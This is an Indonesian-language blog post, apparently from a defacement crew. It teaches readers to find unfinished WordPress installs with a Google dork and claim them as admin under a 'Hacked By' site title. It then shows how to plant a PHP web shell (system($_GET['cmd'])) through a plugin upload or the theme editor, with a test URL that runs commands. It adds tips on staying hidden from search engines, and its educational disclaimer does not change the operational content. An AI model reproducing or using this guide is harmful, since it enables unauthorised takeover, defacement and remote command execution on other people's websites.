🔥Deface WP Install + Up Shell 2025
🕵️♂️ Cari Target WP yang Masih Bau Kencur
Gas dorking ini di Google:
inurl:/wp-admin/install.php?step=1
Itu target masih polos, belum ada isian sama sekali—ibarat rumah kosong, tinggal masuk sambil bilang “permisi, numpang jadi admin bentar ya!”
Modif juga tuh dork-nya. Tambahin variasi seperti intitle:"WordPress › Installation" biar makin mantap.
🔧 Setup WordPress — Jadi Admin Tanpa Interview
Dapet target? Sip. Layar setup-nya bakal nongol kayak form daftar WiFi tetangga:
- Site Title: Bebas, contoh
Hacked By 0x6ick - Username: Terserah, misal
adminataup3n3tr4t0r - Password: Jangan
123456lah bro - Email: Bisa fake
Centang bagian "Search Engine Visibility" biar gak langsung keindeks Google. Biar basecamp lu gak ketahuan cepet 😈
🧨 Instalasi Tanpa Banyak Bacot
Klik tombol Install WordPress, dan bacain mantra:
“Semoga shellku awet, themes-nya gak auto update, dan gak kena Htaccess gate.”
Kalau muncul Success! WordPress has been installed., lanjut login pake akun yang tadi lu buat.
🐚 Upload Shell — Seni Menyusup ala Ninja Koding
📦 Opsi 1: Plugins
Upload via menu:
Dashboard > Plugins > Add New > Upload Plugin (.zip)
Isi plugin dengan shell kayak gini:
<?php system($_GET['cmd']); ?>
🎨 Opsi 2: Theme Editor
Edit file kayak 404.php atau footer.php dari menu:
Appearance > Theme Editor
Tempel script/uploader shell bar-bar, lalu simpan.
🧪 Test Shell:
https://target.com/wp-content/themes/nama-theme/404.php?cmd=whoami
Kalau muncul www-data atau semacamnya, selamat bro! Lu udah jadi penumpang gelap di kapal WordPress! 🚢
⚠️ Disclaimer
This article is intended solely for educational purposes only.The creator shall not be held liable for any misuse, illegal activities, or damages resulting from the unauthorized use of this .
"Where creativity, exploitation, and expression collide." — 6ickZone
Author: Nyx6st
Motto: “Jangan lupa backup index awokwok”
Posting Komentar